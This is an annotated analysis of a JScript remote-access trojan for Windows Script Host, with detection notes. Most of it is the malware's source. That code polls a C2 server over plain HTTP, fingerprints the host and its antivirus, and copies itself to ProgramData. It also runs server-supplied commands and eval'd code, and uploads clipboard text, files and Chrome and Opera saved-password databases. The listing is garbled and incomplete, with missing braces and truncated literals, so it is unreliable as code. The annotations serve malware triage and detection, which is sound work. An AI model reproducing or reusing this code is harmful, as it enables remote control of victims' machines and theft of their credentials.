// Analyst notes: configuration and globals of a Windows Script Host (JScript) remote-control
// script. Identifiers are machine-renamed. The listing is incomplete as pasted (missing lines,
// truncated string literals), so it does not parse as shown.
- // ------------ Config --------------- //
// dyn74 is used as the host part of 'http://' + dyn74 + ':' + yng97 + '/...' in oju28().
// NOTE(review): a bare decimal string in host position looks like a 32-bit integer form of an
// IPv4 address. Decode and confirm before recording it as an indicator.
- var dyn74 = '100613900'
// TCP port used in the same URL.
- var yng97 = 87
// Drop/working directory. It is expanded and given a trailing backslash a few lines below.
- var bgb15 = '%ProgramData%'
// Delay passed to WScript.sleep() in the main loop. The 'Sleep' command overwrites it.
- var lwx52 = 300
- // ------------ public var ----------- //
// COM objects used throughout: shell (process launch, registry, env vars), file system,
// HTTP client, and WinNTSystemInfo (read for UserName in yst77()).
- var wch74 = WScript.CreateObject('WScript.Shell')
- var ftx16 = WScript.CreateObject('scripting.filesystemobject')
- var pcv92 = WScript.CreateObject('msxml2.xmlhttp')
- var syc31 = WScript.CreateObject('WinNTSystemInfo')
- // ------------ private var ----------- //
// Base64 alphabet. It is not referenced by any line visible on this page.
- var vqs72 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
// File name of the running script. It is reused as the copy's file name in yhp97().
- var rjb74 = WScript.scriptname
// Path of the user's Startup folder. No visible line uses it.
// NOTE(review): a persistence step that used it may have been lost in the paste. Check the
// Startup folder during triage.
- var eua22 = wch74.specialfolders('Startup') + '\\'
- var bgb15 = wch74.expandenvironmentstrings(bgb15) + '\\'
// Field delimiter for C2 responses and for the host fingerprint. The literal is truncated on
// this page (only '<' survives), so the real delimiter cannot be recovered from here.
- var fog32 = '<
- var wnd98,ijo62,bhw07
// Analyst notes: main polling loop. Each pass POSTs to the '/is-bekle' path, splits the
// response on the delimiter fog32, and dispatches on the first field as a command name.
// The listing is incomplete as pasted: the 'do {' / 'try {' openers, the switch's opening
// brace and any 'break' statements are absent, so the fall-through seen here may not match
// the original. Several command and path names are Turkish words (bekle, komutcu, dizinver).
// Detection: the script needs the WScript object, so it runs under wscript.exe or cscript.exe.
// Look for that host making periodic plain-HTTP POSTs, and for the 'Bcorp'-prefixed tags in
// request bodies.
- // ------------ Code Start ------------ //
- // check -- antvrs on
// Exits at once when qbp14() (volume serial number of C:) equals this value.
// NOTE(review): purpose not shown. It may exempt one specific machine. Confirm.
- if(qbp14() == "88FDB972"){WScript.Quit(0)}
- // check -- antvrs off
// Copies the script into the drop directory (see yhp97).
- yhp97()
- wnd98 = ''
// Poll for a tasking. The response text is the command line.
- wnd98 = oju28 ('is-bekle','')
- ijo62 = wnd98.split(fog32)
- switch(ijo62[0])
// Changes the poll delay.
- case 'Sleep':
- lwx52 = ijo62[1]
// File read / file upload to the server.
- case 'readtext':
- oju28('txtfile',bjw54(ijo62[1]))
- case 'downfile':
- oju28('filetransfer','BcorpFile' + acu36(ijo62[1]))
// Builds a shell command from server-supplied fields plus the C2 host and runs it hidden.
- case 'upfile':
- sbx61(ijo62[1] + dyn74 + '/a/' + ijo62[3] + ' ' + ijo62[2] + ijo62[3])
// Clipboard text is sent to the server.
- case 'clip-board':
- oju28('is-clip',krf52())
// Arbitrary command execution (hidden window via sbx61, visible window via pmv64).
- case 'excecute':
- sbx61(ijo62[1])
- case 'PlanB':
- pmv64(ijo62[1])
// Browser credential-store collection (see tfi63).
- case 'GetPass':
- tfi63()
// Uploads the contents of 'store.txt' from the drop directory. The code that writes that
// file is not on this page.
- case 'KeyMe':
- oju28('My-Keys','BcorpKey' + bjw54(bgb15 + 'store.txt'))
// Host reconnaissance: drives, folder listing, process list.
- case 'enum-driver':
- oju28('is-enum-driver',kpb62())
- case 'enum-faf':
- oju28('is-enum-faf',nio87(ijo62[1]))
- case 'enum-process':
- oju28('is-enum-process',neu62())
// Command execution with output returned. The second variant goes through a temp file,
// 'brat.tmp', which is deleted afterwards.
- case 'komutcu':
- oju28('komutcu',wja82(ijo62[1]))
- case 'komutcu2':
- oju28('komutcu',bmg86(ijo62[1]))
- kmb95(bgb15+'brat.tmp')
- case 'screen-send':
- egh31(ijo62[1])
- case 'delete':
- kmb95(ijo62[1])
- case 'exit-process':
- apf52(ijo62[1])
- default:
// eval() of server-supplied text means the visible command list does not bound what the
// script can do. Treat a host running this as fully controlled by the server.
- case 'js-text':
- eval(ijo62[1])
// Exec() is not defined anywhere on this page.
- case 'vbs-text':
- Exec(ijo62[1])
- case 'message':
- fxj92(ijo62[1])
- case 'RenFile':
- baa88(ijo62[1],ijo62[2])
// Repoints the drop/working directory at a server-chosen path.
- case 'dizinver':
- bgb15 = wch74.expandenvironmentstrings(ijo62[1]) + '\\'
- }WScript.sleep(lwx52)
// Every error in a pass is swallowed, so a failure never stops the loop.
- }catch(ult43){}
- }while(true)
// Copies the running script into the drop directory (bgb15) under its own file name.
// The closing brace is missing from the listing as pasted.
// Detection: a script file written to the expanded %ProgramData% path by a script host.
- function yhp97(){
- ftx16.CopyFile (WScript.scriptfullname,bgb15 + rjb74)
// Single C2 transport: synchronous HTTP POST (third open() argument is false) to
// http://<dyn74>:<yng97>/<first argument>, with the second argument as the body.
// Returns the response text. The parameter names shadow the globals ijo62 and bhw07.
// Braces are missing from the listing as pasted.
// Detection: traffic is unencrypted HTTP. The header name literal is 'user-agent:' (with a
// trailing colon) and its value is the delimiter-joined host fingerprint built by yst77().
- function oju28(ijo62,bhw07)
- pcv92['open']('POST', 'http://' + dyn74 + ':' + yng97 + '/' + ijo62, false)
- pcv92.setRequestHeader('user-agent:', yst77())
- pcv92['send'](bhw07)
- var xjc97 = pcv92['responsetext']
- return xjc97
// Builds the host fingerprint sent on every request, joined with the delimiter fog32.
// Fields in order: qbp14() value, UserName, OS caption + architecture, script name, antivirus
// display name (or 'Err'), drop directory, .NET 2.0 marker, 'C', poll delay, 'J'.
// The listing is incomplete as pasted: try/brace lines are missing and the ExecQuery flags
// argument is split across two lines with its operator lost.
- function yst77()
- var glb39,pks30,swc22,ury87,kpc44
- glb39 = qbp14() + fog32
- glb39 = glb39 + syc31.UserName + fog32
// WMI: operating system caption, architecture and system drive.
- var luq53 = GetObject('winmgmts:\\\\.\\root\\CIMV2')
- var fjn56 = luq53.ExecQuery('SELECT * FROM Win32_OperatingSystem', 'WQL', 0x10
- 0x20)
- var urf75 = new Enumerator(fjn56)
- var ucq81 = urf75.item()
- ury87 = ucq81.Caption +' '+ ucq81.OSArchitecture
// kpc44 is assigned but never appended to the fingerprint in the visible lines.
- kpc44 = ucq81.SystemDrive
// WMI: display name of the first antivirus product registered with Security Center.
// Detection: a script host querying root\securitycenter2 'antivirusproduct'.
- var bfs28 = GetObject('winmgmts:\\\\localhost\\root\\securitycenter2')
- var hkk63 = bfs28.ExecQuery('select * from antivirusproduct','WQL', 0)
- var hhc18 = new Enumerator(hkk63)
- var jem99 = hhc18.item()
- pks30 = jem99.displayname
- }catch(ezp32){pks30 = 'Err'
// Registry read of a .NET Framework 2.0 policy value. It is reported as 'True' when the value
// is '50727-50727', and as '-' when the read fails.
- try{swc22 = wch74.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0\\50727')
- }catch(ezp32){swc22 = '-'
- if(swc22 == '50727-50727'){swc22 = 'True'}
- glb39 = glb39 + ury87 + fog32
- glb39 = glb39 + rjb74 + fog32
- glb39 = glb39 + pks30 + fog32
- glb39 = glb39 + bgb15 + fog32
- glb39 = glb39 + swc22 + fog32
- glb39 = glb39 + 'C' + fog32
- glb39 = glb39 + lwx52 + fog32
- glb39 = glb39 + 'J' + fog32
- return glb39
// Returns the VolumeSerialNumber of logical disk C:. It serves as the host identifier in
// yst77() and in the start-up check of the main script.
// Lines are missing from the listing as pasted: luq53 and jem99 are not assigned inside this
// function in the visible lines.
- function qbp14(){
- var njo83 = luq53.ExecQuery("SELECT * FROM Win32_LogicalDisk Where DeviceID = 'C:'")
- var hhc18 = new Enumerator(njo83)
- var uxx34 = jem99.VolumeSerialNumber
- return uxx34
// Runs 'cmd.exe /c <argument>' with window style 0 (hidden). Errors are swallowed.
// The 'try {' opener and braces are missing from the listing as pasted.
// Detection: wscript.exe or cscript.exe as the parent of cmd.exe with a '/c' command line.
- function sbx61(dul72)
- wch74['run']('cmd.exe /c '+dul72,0)
- catch(ult43){}
// Runs the argument directly through WScript.Shell.Run with window style 1 (normal window).
// Braces are missing from the listing as pasted.
- function pmv64(dul72)
- wch74.Run(dul72,1)
// Shows the argument to the logged-in user in a WScript.Shell popup dialog.
// Braces are missing from the listing as pasted.
- function fxj92(dul72)
- wch74.Popup(dul72)
// Enumerates drives through the FileSystemObject. Returns 'BcorpDriver' followed by one
// record per drive (drive letter, drive type), each ended with the delimiter fog32.
// The loop header and a separator string literal are garbled in the listing as pasted.
- function kpb62()
- var s, n, e, d
- e = new Enumerator(ftx16.Drives)
- s = ''
- e.atEnd()
- e.moveNext())
- { d = e.item()
- s = s + d.DriveLetter+':'+'
- '+d.DriveType+fog32
- return('BcorpDriver' + s)
// Lists one folder: subfolders (tagged 'd') go into s, files with their size (tagged 'f') go
// into s1. Returns 'BcorpFaf' + s + s1.
// Loop headers and the separator string literals are garbled in the listing as pasted.
// s1 is absent from the var list, so it is assigned as a global. No visible line gives s an
// initial value.
- function nio87(dul72)
- var fs, f, fc, s, fc1
- s1 = ''
- fs = new ActiveXObject('Scripting.FileSystemObject')
- f = fs.GetFolder(dul72+'\\')
- fc = new Enumerator(f.SubFolders)
- fc.atEnd()
- fc.moveNext())
- s += fc.item()
- s += '
- '+''+'
- '+'d'+'
- '+fog32
- fc1 = new Enumerator(f.files)
- fc1.atEnd()
- fc1.moveNext())
- s1 += fc1.item()
- s1 += '
- '+fc1.item(0).size+'
- '+'f'+'
- return('BcorpFaf'+s+s1)
// Enumerates Win32_Process instances through WMI. Returns 'BcorpProccess' followed by one
// record per process (Name, ProcessID, ExecutablePath), each ended with the delimiter fog32.
// The for-loop header and separator string literals are garbled in the listing as pasted.
// gli28 is assigned without var.
- function neu62()
- var npf82 = GetObject('WinMgmts:').InstancesOf('Win32_Process')
- var pos85 = ''
- gli28 = new Enumerator(npf82)
- for (
- gli28.atEnd()
- gli28.moveNext())
- var waa83 = gli28.item()
- pos85 += waa83.Name + '
- ' + waa83.ProcessID + '
- ' + waa83.ExecutablePath + fog32
- return('BcorpProccess' + pos85)
// Collects the output of a WScript.Shell.Exec object: reads StdOut and then StdErr line by
// line and joins the lines with the marker '<Satir>'. Returns the combined text.
// The loop conditions are garbled in the listing as pasted.
- function ekr13(oyg46)
- var wup34 = ''
- wup34 = wup34 + oyg46.StdOut.Readline() + '<Satir>'
- while(
- oyg46.StdOut.AtEndOfStream)
- wup34 = wup34 + oyg46.StdErr.Readline() + '<Satir>'
- oyg46.StdErr.AtEndOfStream)
- return(wup34)
// Runs '%comspec% /c <argument>' through WScript.Shell.Exec, polls Status once a second while
// it is 0, gathers output with ekr13(), and returns 'BcorpCmd1' + output.
// The second loop's condition is garbled in the listing as pasted.
// Detection: a script host spawning the command interpreter. The output leaves the host in
// the body of a POST to the '/komutcu' path.
- function wja82(dul72) {
- var oyg46 = wch74.Exec('%comspec% /c ' + dul72)
- while (oyg46.Status == 0)
- WScript.Sleep(1000)
- var vfl33
- while ( (vfl33 = ekr13(oyg46))
- = -1) {
- return('BcorpCmd1'+vfl33)
// Runs the argument hidden (window style 0) with output redirected to 'brat.tmp' in the drop
// directory, waits one second, then returns 'BcorpCmd2' + the file's contents.
// NOTE(review): '%comspec%' is assembled from two string pieces, presumably to avoid a
// literal match. Match on the assembled command line rather than the source text.
// Detection: creation of 'brat.tmp' under the drop directory by a cmd.exe child of a script host.
- function bmg86(dul72) {
- wch74['run']('%com'+'spec% /c '+dul72+' > '+bgb15+'brat.tmp',0)
- WScript.sleep(1000)
- return('BcorpCmd2'+bjw54(bgb15+'brat.tmp'))
// Opens the given path for reading (iomode 1) and returns its whole contents as text.
// The third argument, true, makes OpenTextFile create the file when it does not exist.
// The closing brace is missing from the listing as pasted.
- function bjw54(spo66) {
- var fp1 = ftx16.OpenTextFile(spo66, 1, true)
- return fp1.ReadAll()
// Renames a file by passing 'ren <oldname> <newname>' to the hidden cmd.exe runner sbx61().
// Both names come from the server response and are concatenated unquoted.
- function baa88(oldname,newname) {
- sbx61('ren ' + oldname + ' ' + newname)
// Deletes the given path, first as a file and then as a folder, through the FileSystemObject.
// Braces are missing from the listing as pasted.
- function kmb95(dul72)
- ftx16.DeleteFile(dul72)
- ftx16.DeleteFolder(dul72)
// Reads the clipboard's text through an 'htmlfile' COM object and returns it prefixed with
// 'BcorpClip'.
// Detection: a script host instantiating 'htmlfile' in order to reach clipboardData.
- function krf52()
- var hqu92 = new ActiveXObject('htmlfile').parentWindow.clipboardData.getData('text')
- return('BcorpClip'+hqu92)
// Collects browser credential stores. When the Chrome or Opera 'Login Data' file exists under
// the user profile, it is copied into the drop directory ('ChDb.sql' / 'OpDb.sql') and
// uploaded base64-encoded to the '/filetransfer' path, tagged 'BcorpPassCh' / 'BcorpPassOp'.
// The first call goes to er0(), whose body is empty on this page.
// Detection: a non-browser process (cmd.exe 'copy' under a script host) reading 'Login Data',
// and the 'ChDb.sql' / 'OpDb.sql' files in the drop directory.
// Response: treat passwords saved in these browser profiles as exposed.
- function tfi63()
- er0('filetransfer','BcorpPassCh')
- if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'))
- {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"' + ' ' + bgb15 + 'ChDb.sql')
- WScript.Sleep(500)
- oju28('filetransfer','BcorpPassCh' + acu36(bgb15 + 'ChDb.sql'))
- if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data'))
- {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"' + ' ' + bgb15 + 'OpDb.sql')
- oju28('filetransfer','BcorpPassOp' + acu36(bgb15 + 'OpDb.sql'))
// Force-terminates a process tree by PID: passes 'taskkill /F /T /PID <argument>' to sbx61().
// Braces are missing from the listing as pasted.
- function apf52(dul72)
- sbx61('taskkill /F /T /PID ' + dul72)
// Reads a file as binary (ADODB.Stream with Type = 1) and base64-encodes it by assigning the
// bytes to an XMLDOM element whose dataType is 'bin.base64'. Returns the element text after
// a regex replace.
// The regex literal is split and garbled in the listing as pasted.
// NOTE(review): it presumably strips characters outside the base64 alphabet. Confirm
// against an intact sample.
- function acu36(pepe) {
- var rfx48 = new ActiveXObject('ADODB.Stream')
- rfx48.Open()
- rfx48.Type = 1
- rfx48.LoadFromFile(pepe)
- var wes77 = rfx48.Read()
- var hym47 = new ActiveXObject('Microsoft.XMLDOM')
- var fbs41 = hym47.createElement('tmp')
- fbs41.dataType = 'bin.base64'
- fbs41.nodeTypedValue = wes77
- return(fbs41.text.replace(/[
- A-Z\d+=\/]/gi, ''))
// Uploads 'kukuri.bmp' from the drop directory, base64-encoded and tagged 'BcorpImage', then
// sleeps 400 ms and POSTs to the '/transfercomplate' path with no body.
// The parameter pori is unused in the visible lines, and the step that produces the bitmap
// is not on this page.
// Detection: a 'kukuri.bmp' file appearing in the drop directory.
- function egh31(pori)
- oju28('filetransfer','BcorpImage' + acu36(bgb15 + 'kukuri.bmp'))
- WScript.Sleep(400)
- oju28('transfercomplate')
// Empty stub: the body is an empty try/catch and the function ignores its arguments.
// It is called once, from tfi63().
- function er0()
- {try{}catch(O){}}